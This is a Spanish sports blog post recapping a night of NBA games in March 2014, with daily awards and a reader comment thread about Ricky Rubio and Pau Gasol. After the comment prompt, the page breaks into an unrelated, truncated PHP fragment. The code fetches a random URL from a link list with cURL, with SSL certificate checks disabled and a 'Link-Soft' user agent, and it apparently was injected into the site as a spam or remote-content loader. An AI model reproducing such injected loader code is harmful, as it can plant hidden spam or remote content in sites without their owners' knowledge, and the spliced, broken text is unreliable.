La Crónica: Una conferencia desangelada

20 de March de 2014 por Simon

Ya sabemos que lo hemos repetido muchas veces, que hemos debatido sobre ello una y mil veces, que lo seguiremos haciendo y que todos estaremos de acuerdo en el bajo nivel de la conferencia Este. Lo que nunca nos habíamos planteado es que ni siquiera sus dos mejores equipos fueran capaces de convencernos. Con Indiana y Miami en crisis de juego y de resultados… ¿qué nos queda en el Este?

La última vez que Indiana venció a un equipo que estaba por encima del 50% fue el 7 de Febrero cuando se impusieron tras una prórroga a los Portland Trail Blazers. Desde entonces un calendario benévolo les ha permitido mantenerse a flote. El buen momento que viven los New York Knicks (7 victorias seguidas y la reciente incorporación de Phil Jackson) no era el mejor escenario para cambiar la dinámica del equipo. El primer cuarto nos mostró todos los defectos y dificultades que está sufriendo Indiana últimamente: Problemas gravísimos para anotar y hacer fluir el ataque pero una defensa que, aunque a menor nivel que hace unos meses, mantiene al equipo durante algunas fases del encuentro. A pesar de varias idas y venidas, los Pacers consiguieron mantener el partido igualado hasta el último cuarto en el que Anthony se bastó para derrotarles (86-92). Si los Pacers han mantenido el primer puesto de la conferencia a pesar de su bache es porque sus máximos rivales y actuales campeones no están para tirar cohetes tampoco. El hecho de que Lebron James se perdiera el partido de ayer era un mal augurios pero sus compañeros saltaron a la pista concienciados de que entre todos tenían que minimizar su baja. Salieron muy centrados y rápidamente cogieron ventajas cercanas a la decena de puntos pero la gran dirección de Rondo y el acierto desde el triple de Avery Bradley minimizó la ventaja. El partido se encaminaba a un final apretado. Un triple de Jeff Green y sobretodo un salto entre dos que Rondo ganó a Haslem dieron alas a los Celtics para llevarse la victoria ante los mermados Heat (96-101). 

Los que no fallaron anoche en el Este fueron los equipos del segundo vagón de la conferencia. Raptors, Bulls y Nets cumplieron en sus compromisos y se llevaron la victoria. Los Nets fueron los que más difícil lo tuvieron ya que los Charlotte Bobcats no pusieron las cosas fáciles y les obligó a los a sacar lo mejor de sí mismos. La buena noticia para los de Brooklyn es que Deron Williams llega al final de temporada en buena forma como demostró con 11 puntos en los últimos 6 minutos que finiquitaron el partido (99-104). Tampoco lo tuvieron fácil los Toronto Raptors (segundo partido de un back to back) a pesar de que los Pelicans no contaron con la presencia de su ala-pívot estrella Anthony Davis. Todos los de New Orleans tuvieron una gran noche y a punto estuvieron de sorprender a los candienses. Sin embargo, en el último cuarto sí que echaron de menos a alguien capaz de liderar al equipo cuando la bola quema y eso fue lo que permitió a los Raptors remontar el encuentro e imponerse (107-100). Por su parte los Bulls cumplieron con el trámite que es enfrentarse a los Sixers en este final de campaña victoria fácil, sin muchos alardes y a otra cosa mariposa (102-94).

Tampoco fallaron los Spurs que sumaron la undécima victoria consecutiva que les otorga una buena ventaja en la carrera por el mejor ranking de la liga. Ayer vencieron a los Lakers sin demasiados problemas. Durante 36 minutos dejaron hacer a los voluntariosos jugadores amarillos para en el último cuarto pisar un poco el acelerador y no pasar ningún tipo de apuros en los minutos finales (125-109).

Anoche asistimos también a un nuevo capítulo en la pelea por los PO en el Oeste. Memphis Grizzlies cumplió en su partido contra los Jazz. Parecía que el encuentro estaba acabado al descanso pero Utah fue capaz de empatar el partido a falta de 5 minutos, momento en el que los Grizzlies pusieron a funcionar a su defensa de nuevo y ya sólo permitieron 2 puntos más a los Jazz en ese periodo (86-96). Los Mavs tropezaron en casa ante los Wolves liderados por el mejor Ricky Rubio de siempre. Dallas siempre fue a remolque gracias al primer cuarto de los de Adelman pero poco a poco consiguieron frenar el ataque de los visitantes e igualar el partido en los instantes finales gracias al acierto de Monta Ellis. Los Wolves dispusieron de varias oportunidades para ganar el encuentro en la última jugada y fallaron todas por lo que el partido se fue a la prórroga. Una vez allí el final de la misma volvió a ser igualadísimo. Kevin Love puso a su equipo uno arriba a falta de 17 segundos y dejó la pelota en el tejado de los locales. En la última jugada Dirk Nowitzki no fue capaz de anotar por encima del propio Love y los Wolves se llevaron la victoria (123-122). Phoenix Suns aprovechó la derrota de los Mavs para aferrarse a la posibilidad de agarrar esa octava plaza de la conferencia y vencieron a los Magic con facilidad (93-109). En el único partido  que nos queda por comentar, Denver Nuggets venció a los Pistons remontando en la segunda mitad con un espectacular Aaron Brooks (109-118).

PREMIOS

MVP: Nadie nos podrá acusar de chauvinistas si nombramos MVP indiscutible del día a Ricky Rubio. El español no dejó una hoja estadística sublime de 22 puntos, 10 rebotes, 15 asistencias y 4 robos y los Wolves se alzaron con la victoria en la prórroga. ¿Qué más se puede pedir?

Rookie: Michael Carter-Williams volvió a esos números tan típicos suyos (16-9-7) pero preferimos destacar los 10 puntos y 11 rebotes de Gorgui Dieng saliendo de titular en sustitución de Pekovic.

Sorpresa: Aaron Brooks estuvo literalmente imparable ante los Pistons. No sólo anotó 27 puntos sinó que repartió 17 asistencias, el máximo de su carrera.

Decepción: Algo más de 3 puntos, 1 rebote y 1 asistencias deben de esperar los Pacers de Evan Turner, ¿no?

Esfuerzo en vano: Pau Gasol lideró a los Lakers con 22 puntos, 10 rebotes, 6 asistencias y 4 robos pero los amarillos no inquietaron a los Spurs a pesar de jugar en casa.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. Esteban dice:
    #1

    “Nadie nos podrá acusar de chauvinistas si nombramos MVP indiscutible del día a Ricky Rubio. El español no dejó una hoja estadística sublime de 22 puntos, 10 rebotes, 15 asistencias y 4 robos y los Wolves se alzaron con la victoria en la prórroga. ¿Qué más se puede pedir?”

    Es exacto, nada que discutir hoy, tremendo juego para Rubio, en un partido reñidisimo y contra un rival de peso, se salio como pocos, SHAPO, justo cuando mas se mira a los Wolves, y se dice, que les falta para llegar a PO? yo particularmente miraba al puesto de alero y de reojo a su base

    muy diferente a esas noches de triple doble, en partidos donde al descanso su equipo ganaba por 40

      Citar

  2. Jose Luis dice:
    #2

    Yo creo que el mayor problema de los Wolves es que no tienen un jugador que desde el perímetro y desde el drible consiga canastas.

    Brewer es solo un corredor de contraataques, aunque claro puede encestar tiros abiertos y hacer alguna jugada puerta atrás. Martin poco a poco se ha convertido en solo un lanzador, y Ricky no es un driblador que llegue hasta el aro.

    Eso es lo que les falta, a mi parecer.

      Citar

  3. Esteban dice:
    #3

    siguiendo con los españoles

    “Pau Gasol lideró a los Lakers con 22 puntos, 10 rebotes, 6 asistencias y 4 robos pero los amarillos no inquietaron a los Spurs a pesar de jugar en casa”

    excelente renacer de Pau Gasol, con los mejores números desde que llego a los Lakers, a esa tierna edad, pocos podían esperarlo, ojala se mantengan en los lakers y le den la posibilidad de mostrar su valor actual con otro entrenador

      Citar

  4. Chipi dice:
    #4

    El premio MEV, que antes era conocido como “Premio Granger”, este año debería llamarse “premio Gasol”

      Citar

  5. Jose Luis dice:
    #5

    Chipi:
    El premio MEV, que antes era conocido como “Premio Granger”, este año debería llamarse “premio Gasol”

    También hubo una época que se llamaba Premio Love xdddd

      Citar

  6. Vader dice:
    #6

    Soy un gran fan de Gasol pero para ser justos debo decir que hay que tener en cuenta que en el sistema de Dantoni cualquier jugador, y más si es bueno como Gasol, hincha sus números de ataque…

    Grande Ricky que tiene que ser siempre así de agresivo penetrando y grandes mis Knicks recibiendo a Phil con una victoria y Melo sacando los galones ante Paul George.

    Saludos

      Citar

  7. Jose Luis dice:
    #7

    Fijate Vader, Ricky se hinchó a penetrar cuando tenía enfrente un base que conoce muy bien, como que le tiene confianza, y sabe que puede superarle. Al resto de bases, a pocos le hace eso.

      Citar

  8. HisRoyalAirness dice:
    #8

    El problema de Ricky para penetrar no son los bases rivales, que se lleva a quien le sale de la gaita (no me discutáis, ved los partidos, su manejo de balón no tiene que envidiar al de nadie), son los pivots. Se le hace de noche con los tapones.

      Citar

  9. Jose Luis dice:
    #9

    No digo que le falte manejo, pero quizá le falte velocidad y musculo… y claro, a Calderón si que le supera en esos apartados, además que le conoce y tiene confianza en poder irse de él.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>